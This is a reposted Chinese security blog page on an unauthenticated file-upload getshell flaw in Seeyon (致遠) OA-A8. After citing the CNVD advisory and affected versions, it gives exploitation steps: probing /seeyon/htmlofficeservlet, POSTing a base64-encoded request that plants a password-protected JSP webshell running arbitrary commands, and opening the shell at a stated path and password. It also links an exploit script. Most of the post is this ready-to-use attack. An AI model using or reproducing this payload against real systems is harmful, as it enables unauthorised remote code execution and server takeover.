碼上快樂

相關內容    簡體    繁體

致遠OA-A8協同管理軟件無需登錄getshell漏洞

本文轉載自   查看原文   2019-06-28 20:12   8714 

CNVD《關於致遠OA-A8系統存在遠程命令執行漏洞的安全公告》:https://www.cnvd.org.cn/webinfo/show/5095

該系統的漏洞點在於致遠OA-A8系統的Servlet接口暴露,安全過濾處理措施不足,使得用戶在無需認證的情況下實現任意文件上傳。

攻擊者利用該漏洞,可在未授權的情況下,遠程發送精心構造的網站后門文件,從而獲取目標服務器權限,在目標服務器上執行任意代碼漏洞。

影響范圍:

致遠A8-V5協同管理軟件 V6.1sp1

致遠A8+協同管理軟件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致遠A8+協同管理軟件 V7.1

上面是CNVD發布的漏洞影響范圍,但我在V6.1_SP2版本依然測試成功,不知道為什么。

測試環境:致遠A8-V5協同管理軟件 V6.1_SP2_2018-03-27_2653852748


第1步:訪問/seeyon/htmlofficeservlet
如果出現下圖所示的內容,表示存在漏洞。

第2步:構造PoC
把下面的PoC經base64解碼就是POST數據包內容:

REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=

 

 

 

第3步:訪問webshell
webshell地址為/seeyon/test123456.jsp,密碼為:asasd3344。

 

感謝大佬提供的Python腳本,參考鏈接:https://github.com/nian-hua/CVEScript/blob/master/%E8%87%B4%E8%BF%9COA/zhiyuan.py

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 致遠 OA 組合 getshell 通達OA任意用戶登錄和后台GetShell漏洞復現 致遠OA ajaxAction formulaManager 文件上傳漏洞 通達OA 11.2后台getshell漏洞復現 致遠OA文件上傳漏洞——可以上傳webshell JabRef 文獻管理軟件 Ubuntu管理軟件源 項目管理軟件 管理軟件的優缺點 通達OA 11.7 后台sql注入getshell漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM